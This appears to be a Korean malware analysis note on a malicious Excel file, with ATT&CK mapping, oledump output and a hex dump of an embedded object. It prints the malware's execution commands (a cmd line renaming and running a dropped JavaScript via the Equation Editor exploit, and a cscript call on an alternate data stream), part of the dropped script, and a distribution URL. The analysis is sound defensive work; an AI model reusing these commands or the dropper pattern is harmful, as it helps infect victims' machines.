엑셀 문서형 악성코드 분석 기초 -> 중급

https://app.any.run/tasks/37815760-32ee-4bdd-993a-4046200ff2a0/

http://getaldus.mk/new_guidelines.csv - Interactive analysis - ANY.RUN

✅ 프로세스 실행 순서도

1. Excel DDE (Dynamic Data Exchange) 사용 (매크로)
2. 수식편집기 취약점 사용

✅ ATT&CK 매트릭

Tatics

• Excution

Techniques

Scripting T1064

Cmdline:Image:

C:\Windows\System32\cscript.exe C:\programdata\asc.txt:script1.vbs

C:\Windows\System32\cscript.exe

Command-Line Interface T1059

3432 EQNEDT32.EXE (1)

CMD /C REN %TMP%\ZZ J.JS&WSCRIPT %TMP%\J.JS C

Exploitation for Client Execution T1203

Equation Editor starts application (CVE-2017-11882) (1)

✅ 기초분석

✅ oledump

엑셀 문서에는 OLE 객체로 "자바 스크립트"가 포함되어 있으며 Package를 통해 문서 실행시 자동으로 파일 생성

• 파일 위치 및 파일명 : %temp%\zz
• MD5 : bbdff5897533427b0a215e5d1979cd13
• 파일 위치 및 파일 명 : %temp%\xx
• MD5 : 335f5b6889be6c0195093b2483026b99

oledump.py C:\\Users\\kayits\\Desktop\\new_guidelines.csv
A: xl/vbaProject.bin
 A1:       617 'PROJECT'
 A2:       149 'PROJECTwm'
 A3: M   81751 'VBA/Module1'
 A4: m     991 'VBA/Sheet1'
 A5: m     991 'VBA/Sheet2'
 A6: m     991 'VBA/Sheet3'
 A7: m     991 'VBA/Sheet4'
 A8: m     999 'VBA/ThisWorkbook'
 A9:      3390 'VBA/_VBA_PROJECT'
A10:       613 'VBA/dir'
B: xl/embeddings/oleObject1.bin
 B1:        76 '\\x01CompObj'
 B2: O    1120 '\\x01Ole10Native'
C: xl/embeddings/oleObject2.bin
 C1:        76 '\\x01CompObj'
 C2: O    9282 '\\x01Ole10Native'
D: xl/embeddings/oleObject3.bin
 D1:       102 '\\x01CompObj'
 D2:        62 '\\x01Ole'
 D3:       256 'Equation Native

oledump.py C:\\Users\\kayits\\Desktop\\new_guidelines.csv -s B2
00000000: 5C 04 00 00 02 00 7A 7A  00 43 3A 5C 54 6F 30 6C  \\.....zz.C:\\To0l
00000010: 73 5C 42 75 69 6C 64 65  72 5C 74 65 6D 70 5C 7A  s\\Builder\\temp\\z
00000020: 7A 00 00 00 03 00 2A 00  00 00 43 3A 5C 55 73 65  z.....*...C:\\Use
00000030: 72 73 5C 41 44 4D 49 4E  49 7E 31 5C 41 70 70 44  rs\\ADMINI~1\\AppD
00000040: 61 74 61 5C 4C 6F 63 61  6C 5C 54 65 6D 70 5C 32  ata\\Local\\Temp\\2
00000050: 5C 7A 7A 00 76 03 00 00  0D 0A 20 20 20 20 20 20  \\zz.v.....
00000060: 20 20 76 61 72 20 6F 62  6A 73 68 65 6C 6C 20 3D    var objshell =
00000070: 20 6E 65 77 20 41 63 74  69 76 65 58 4F 62 6A 65   new ActiveXObje
00000080: 63 74 28 22 57 73 63 72  69 70 74 2E 53 68 65 6C  ct("Wscript.Shel
00000090: 6C 22 29 3B 0D 0A 20 20  20 20 20 20 20 20 76 61  l");..        va
000000A0: 72 20 73 74 72 66 6F 6C  64 65 72 70 61 74 68 20  r strfolderpath
000000B0: 3D 20 6F 62 6A 73 68 65  6C 6C 2E 45 78 70 61 6E  = objshell.Expan
000000C0: 64 45 6E 76 69 72 6F 6E  6D 65 6E 74 53 74 72 69  dEnvironmentStri
000000D0: 6E 67 73 28 22 25 74 65  6D 70 25 22 29 3B 0D 0A  ngs("%temp%");..
000000E0: 20 20 20 20 20 20 20 20  76 61 72 20 64 68 75 66          var dhuf
000000F0: 69 64 73 6A 6B 66 73 64  76 73 64 66 76 66 64 76  idsjkfsdvsdfvfdv
00000100: 64 66 3B 0D 0A 20 20 20  20 20 20 20 20 66 75 6E  df;..        fun

https://m.blog.naver.com/PostView.naver?isHttpsRedirect=true&blogId=stop2y&logNo=221284284990 

[문서형악성코드] MS Office 문서 구조

 

마이크로 소프트 오피스 수식편집기 (EQNEDT32.exe)

• 마이크로 소프트 오피스 프로그램에서 수학 공식을 쉽게 작성할 수 있도록 도와주는 서브프로그램

수식편집기 취약점을 사용하여 "자바 스크립트" 실행

• 실행 명 령 : CMD /C REN %TMP%\ZZ J.JS&WSCRIPT %TMP%\J.JS

CVE-2018-0798

• 마이크로 소프트 오피스 프로그램이 메모리의 개체를 제대로 처리 하지 못하는 경우 소프트웨어에 원격 코드 실행 취약성이 존재